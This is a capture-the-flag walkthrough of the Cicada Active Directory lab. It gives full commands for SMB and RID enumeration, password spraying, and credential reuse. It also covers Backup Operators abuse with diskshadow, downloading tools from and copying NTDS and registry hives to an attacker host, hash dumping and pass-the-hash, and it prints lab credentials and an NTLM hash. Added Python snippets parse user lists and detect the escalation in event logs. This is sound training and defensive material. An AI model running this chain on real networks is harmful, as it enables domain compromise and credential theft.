Overview
Cicada is an Active Directory machine that demonstrates how exposed SMB shares and poor credential handling can lead to domain compromise through credential reuse, script-based password disclosure, and abuse of Backup Operators privileges.
Attack Chain
- Enumerate exposed Active Directory services
- Discover readable SMB shares as Guest
- Extract default password from HR notice
- Enumerate domain users using RID brute forcing
- Password spray default credentials
- Discover credentials in AD user description
- Access DEV share and recover script-stored credentials
- Gain WinRM access as emily.oscars
- Abuse Backup Operators privileges
- Create a shadow copy with diskshadow
- Copy NTDS, SYSTEM, and SECURITY
- Dump domain hashes with impacket-secretsdump
- Authenticate as Administrator using pass-the-hash
Enumeration
Port Scanning
We start by defining the target and running a full TCP port scan to identify the exposed services.
export IP=10.129.231.149; export NAME=CICADA; echo $IP; echo $NAME; ping $IP -c 1
nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME
ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports
nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

Findings
The scan results indicate that the target is part of an Active Directory environment. Key services include DNS (53), Kerberos (88), RPC (135), and SMB (139, 445), along with LDAP (389, 636) and the Global Catalog on 3268 and 3269. Additionally, WinRM (5985) is exposed, which is often useful later for remote access.
From the service banners and LDAP information, the domain is identified as cicada.htb, and the host appears to be the domain controller CICADA-DC.
To confirm the domain naming context, we query LDAP anonymously.
ldapsearch -H ldap://$IP -x -s base namingcontexts

The result confirms the domain as cicada.htb, which is added to /etc/hosts for proper name resolution.
echo "$IP cicada.htb" | sudo tee -a /etc/hosts
SMB Enumeration
Guest Share Access
With SMB exposed, we test whether Guest access is allowed and enumerate available shares.
python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "Guest" -p ""

The HR share is readable, which makes it the first interesting target.
python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "Guest" -p "" -r HR --depth 10

HR Notice Disclosure
We connect to the share using smbclient and download the file.
smbclient //$IP/HR --user=cicada.htb/Guest --password=''
get "Notice from HR.txt"

Reading the file reveals a default password intended for new employees.
cat Notice\ from\ HR.txt

The exposed password is:
Cicada$M6Corpb*@Lp#nZp!8
At this point, we have a password but still need valid usernames to test it against.
User Enumeration
RID Brute Force
To build a user list, we enumerate domain SIDs using impacket-lookupsid.
impacket-lookupsid 'cicada.htb/guest'@$IP -no-pass

The same can also be done with netexec using RID brute forcing.
nxc smb $IP -u 'Guest' -p '' --rid-brute

For the rest of the enumeration, we work with the impacket-lookupsid output, saved to creds/users_raw.txt.

Building a User List
The raw output includes both users and groups, so we keep only lines tagged SidTypeUser (a plain grep for "user" would also match the Domain Users group line) and format the results into a clean username list.
grep 'SidTypeUser' creds/users_raw.txt | awk '{print $2}' | awk -F\\ '{print $2}' > creds/users_potential.txt
The resulting file gives us a usable list of potential domain users.
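The awk pipeline above splits on whitespace and so only works while the object name has no spaces. As an added example (not part of the original walkthrough), the parser below keeps the RID and the SidType of each lookupsid line, so users, groups and the built-in accounts below RID 1000 can be separated cleanly. The sample output is constructed; the domain SID and the RIDs above 1000 are placeholders, the names are the ones the walkthrough discovers.

```python
import re

# One result line of impacket-lookupsid looks like:
#   1104: CICADA\michael.wrightson (SidTypeUser)
LOOKUPSID_LINE = re.compile(
    r"^(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<kind>SidType\w+)\)$"
)

def parse_lookupsid(output: str) -> list[dict]:
    """Parse lookupsid output into records; banner and status lines are skipped."""
    records = []
    for line in output.splitlines():
        m = LOOKUPSID_LINE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            records.append(rec)
    return records

def user_list(output: str, skip_builtin: bool = True) -> list[str]:
    """Return SidTypeUser names only, dropping well-known RIDs (< 1000) by default."""
    return [
        r["name"] for r in parse_lookupsid(output)
        if r["kind"] == "SidTypeUser" and not (skip_builtin and r["rid"] < 1000)
    ]

# Constructed sample output: domain SID and the RIDs above 1000 are placeholders.
SAMPLE = """\
[*] Brute forcing SIDs at 10.129.231.149
[*] Domain SID is: S-1-5-21-000000000-000000000-000000000
500: CICADA\\Administrator (SidTypeUser)
501: CICADA\\Guest (SidTypeUser)
502: CICADA\\krbtgt (SidTypeUser)
512: CICADA\\Domain Admins (SidTypeGroup)
513: CICADA\\Domain Users (SidTypeGroup)
1104: CICADA\\michael.wrightson (SidTypeUser)
1105: CICADA\\david.orelious (SidTypeUser)
1106: CICADA\\emily.oscars (SidTypeUser)
"""

if __name__ == "__main__":
    print("\n".join(user_list(SAMPLE)))
```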

Foothold
Password Spraying
Using the default password, Cicada$M6Corpb*@Lp#nZp!8, found in the HR notice, we perform a password spray against the enumerated users.
nxc smb $IP -u creds/users_potential.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

The spray succeeds for michael.wrightson.
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Credential Discovery via AD Description
With valid credentials, we enumerate domain users again to check for additional information.
nxc smb $IP -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

The output reveals another credential in a user description field:
david.orelious:aRt$Lp#7t*VQ!3
DEV Share Access
We use the david.orelious credentials to enumerate SMB shares.
python3 ~/Tools/smbmap/smbmap/smbmap.py -u david.orelious -p aRt\$Lp\#7t\*VQ\!3 -d cicada.htb -H $IP

This account has read access to the DEV share.
We connect to the share and download the PowerShell backup script.
smbclient //$IP/DEV --user=cicada.htb/david.orelious
get Backup_script.ps1

Reviewing the script reveals another set of credentials.
cat Backup_script.ps1

The discovered credentials belong to emily.oscars.
emily.oscars:Q!3@Lp#M6b*7t*Vt
Initial Access
We validate the credentials over SMB and WinRM.
nxc smb $IP -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
nxc winrm $IP -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

WinRM access is allowed, so we establish an interactive shell.
evil-winrm -i $IP -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

We can now read the user flag.
type C:\Users\emily.oscars.CICADA\Desktop\user.txt

Privilege Escalation
Initial Enumeration
After gaining access as emily.oscars, we begin by checking group membership.
net user emily.oscars /domain

The account is a member of the Backup Operators group. This is highly significant: members of this group are granted SeBackupPrivilege and SeRestorePrivilege, which allow reading and writing files regardless of their ACLs, so on a domain controller they can reach the files that hold the domain's credentials.
We confirm the assigned privileges.
whoami /priv

Both SeBackupPrivilege and SeRestorePrivilege are enabled.
Exploit Privileges
The privilege escalation path is to abuse SeBackupPrivilege to copy protected files from the domain controller. To access locked files such as NTDS.dit, we first create a shadow copy of the C: drive using diskshadow.
We create a diskshadow.txt file locally with the following contents:
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
Because this file will be executed on Windows, we convert it to DOS format.
unix2dos diskshadow.txt

Execution
We transfer the file to the target.
iwr -uri http://10.10.14.89/diskshadow.txt -o c:\windows\temp\diskshadow.txt
We execute diskshadow using the prepared script, which creates and exposes a shadow copy as drive H:.
diskshadow /s c:\windows\temp\diskshadow.txt

To make full use of the backup privileges, we download the SeBackupPrivilege PowerShell modules from the following project:
https://github.com/giuliano108/SeBackupPrivilege
Transfer the required DLL files to the target.
iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dll -o ./SeBackupPrivilegeCmdLets.dll
iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeUtils.dll -o ./SeBackupPrivilegeUtils.dll
Import the modules.
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

We now copy NTDS.dit, SYSTEM, and SECURITY from the shadow copy into a writable location such as C:\Windows\Temp.
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY c:\windows\temp\SECURITY -Overwrite

With the files copied into C:\Windows\Temp, we transfer them back to our attacking machine over SMB.
copy c:\windows\temp\NTDS \\10.10.14.89\SMBtransfer\NTDS
copy c:\windows\temp\SYSTEM \\10.10.14.89\SMBtransfer\SYSTEM
copy c:\windows\temp\SECURITY \\10.10.14.89\SMBtransfer\SECURITY

Once the files are local, we use impacket-secretsdump to extract the domain hashes.
impacket-secretsdump -ntds NTDS -security SECURITY -system SYSTEM LOCAL

This reveals the Administrator NTLM hash.
Administrator:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341
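Every step of this escalation leaves a trace on the DC: the WinRM logon as a Backup Operator is recorded as event 4672 with SeBackupPrivilege in its privilege list, and the shadow copy is created by diskshadow reading a script from a world-writable directory. As an added example (not part of the original walkthrough), the check below flags both over constructed records in the shape of events 4672 and 4688. The account, tool and script paths are the walkthrough's; the logon ids, the svc_backup account and the approved script directory are placeholders standing in for a site's own allowlist.

```python
import re

# Constructed sample events (4672 = special privileges assigned to new logon,
# 4688 = process creation), reduced to the fields the checks need.
EVENTS = [
    {"id": 4672, "user": "CICADA\\emily.oscars", "logon_id": "0x3e7a1",
     "privileges": ["SeBackupPrivilege", "SeRestorePrivilege", "SeShutdownPrivilege"]},
    {"id": 4688, "user": "CICADA\\emily.oscars", "logon_id": "0x3e7a1",
     "cmdline": r"diskshadow /s c:\windows\temp\diskshadow.txt"},
    # administrators always receive this privilege set; allowlisted below
    {"id": 4672, "user": "CICADA\\Administrator", "logon_id": "0x3e7b2",
     "privileges": ["SeBackupPrivilege", "SeDebugPrivilege", "SeTcbPrivilege"]},
    # placeholder sanctioned backup job using a script from the approved directory
    {"id": 4688, "user": "CICADA\\svc_backup", "logon_id": "0x3e7c3",
     "cmdline": r"diskshadow.exe /s C:\ProgramData\BackupJobs\nightly.dsh"},
]

# Placeholders: accounts expected to hold backup rights on the DC, and the only
# directory from which diskshadow scripts are meant to be run.
EXPECTED_BACKUP_ACCOUNTS = {"cicada\\administrator", "cicada\\svc_backup"}
APPROVED_SCRIPT_DIR = "c:\\programdata\\backupjobs\\"
DISKSHADOW_SCRIPT = re.compile(r"diskshadow(?:\.exe)?\s+/s\s+(?P<script>\S+)", re.I)

def find_backup_privilege_abuse(events):
    """Return (logon_id, reason) for logons that obtain SeBackupPrivilege outside
    the expected set and for diskshadow runs scripted from an unapproved path."""
    findings = []
    for e in events:
        user = e["user"].lower()
        if (e["id"] == 4672 and "SeBackupPrivilege" in e["privileges"]
                and user not in EXPECTED_BACKUP_ACCOUNTS):
            findings.append((e["logon_id"], f"SeBackupPrivilege granted to {e['user']}"))
        elif e["id"] == 4688:
            m = DISKSHADOW_SCRIPT.search(e["cmdline"])
            if m and not m["script"].lower().startswith(APPROVED_SCRIPT_DIR):
                findings.append((e["logon_id"], f"diskshadow script {m['script']} run by {e['user']}"))
    return findings

if __name__ == "__main__":
    for logon_id, reason in find_backup_privilege_abuse(EVENTS):
        print(f"[{logon_id}] {reason}")
```

Both findings share the logon id, which is what lets an analyst tie the privileged logon to the shadow-copy creation and then to the outbound SMB copies that follow.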
Administrator Shell
We verify the Administrator hash with netexec.
nxc smb $IP -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
nxc winrm $IP -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'

With WinRM access confirmed, we authenticate using pass-the-hash.
evil-winrm -i $IP -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'

The shell confirms administrative access on the domain controller.
We read the root flag.
type C:\Users\Administrator\Desktop\root.txt

Key Takeaways
Cicada shows how small Active Directory mistakes can chain together into full compromise. Readable SMB shares exposed a default password, user descriptions and scripts leaked additional credentials, and membership in Backup Operators allowed sensitive domain files to be copied and dumped for Administrator access.